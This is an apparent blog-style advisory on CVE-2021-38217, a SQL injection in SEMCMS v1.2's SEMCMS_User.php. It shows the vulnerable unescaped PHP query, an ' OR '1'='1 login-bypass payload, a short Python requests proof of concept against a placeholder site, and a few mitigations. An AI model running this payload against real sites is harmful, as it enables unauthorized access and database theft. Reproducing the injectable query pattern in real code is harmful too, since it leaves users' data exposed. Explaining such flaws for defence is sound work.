CVE-2021-38217 - SEMCMS v1.2 SQL Injection via SEMCMS_User.php—How Attackers Can Break Your Site

In 2021, a serious security flaw, CVE-2021-38217, was discovered in the SEMCMS v1.2 CMS platform. This vulnerability allows anyone to perform a SQL Injection attack through the SEMCMS_User.php file. If you use SEMCMS, the bad news is that an attacker could use this bug to access or destroy your database with just a few keystrokes. Below, I’ll walk you through how this works, the details behind the bug, and some code snippets showing how simple it is to launch this exploit.

What is SQL Injection?

SQL Injection is a classic web application vulnerability where an attacker tricks the application into executing unintended SQL commands. This often happens when user input is added directly into a database query without being cleaned or validated first. The result? An attacker can read, modify, or even delete your database contents.

Where’s the Problem in SEMCMS?

The vulnerable spot is in the file SEMCMS_User.php. In version 1.2, user-supplied data is directly included in a SQL query without any filtering or escaping.

Let’s look at a (simplified) example of the problematic code inside SEMCMS_User.php

// Example code inside SEMCMS_User.php
$user = $_POST['username'];
$pass = $_POST['password'];
$sql = "SELECT * FROM users WHERE username='$user' AND password='$pass'";
$result = mysqli_query($conn, $sql);

Here, variables $user and $pass come directly from user input. If someone submits malicious input, it becomes part of the SQL query.

The resulting SQL query would become

SELECT * FROM users WHERE username='admin' OR '1'='1' AND password='anything'

Because '1'='1' is always true, the query will likely return all users—often logging in as the first admin user found.

But attackers can do more than just log in without a password. They can also read data, add new users, or delete tables.

Proof of Concept—Exploit Code

Here’s a simple example using Python and the requests library that demonstrates how easy it is to exploit this:

import requests

url = 'http://target.site/SEMCMS_User.php';
data = {
  'username': "admin' OR '1'='1",
  'password': "anything"
}

r = requests.post(url, data=data)
print("Login Status:", r.text)

This script just sends the malicious payload. If the site is unpatched, an attacker could log in as *any* user or even dump the database with more advanced queries.

References

- NVD - CVE-2021-38217
- Exploit Database EDB-ID: 50288
- OWASP - SQL Injection

The best way to protect your site

1. Use Prepared Statements: Instead of plugging user data directly in your SQL, use parameterized queries.

Always Validate User Input: Never trust what users enter.

3. Update SEMCMS: If you run v1.2, upgrade to the latest version or apply patches from the developer.

Conclusion

CVE-2021-38217 shows how dangerous SQL Injection can be and how easy it is to make mistakes in code. Even basic applications like SEMCMS v1.2 can leave the door wide open for hackers. If you use SEMCMS or any PHP application, check your code and patch all your input forms. One simple mistake might cost you your entire database!

Timeline

Published on: 10/28/2022 16:15:00 UTC
Last modified on: 10/28/2022 18:46:00 UTC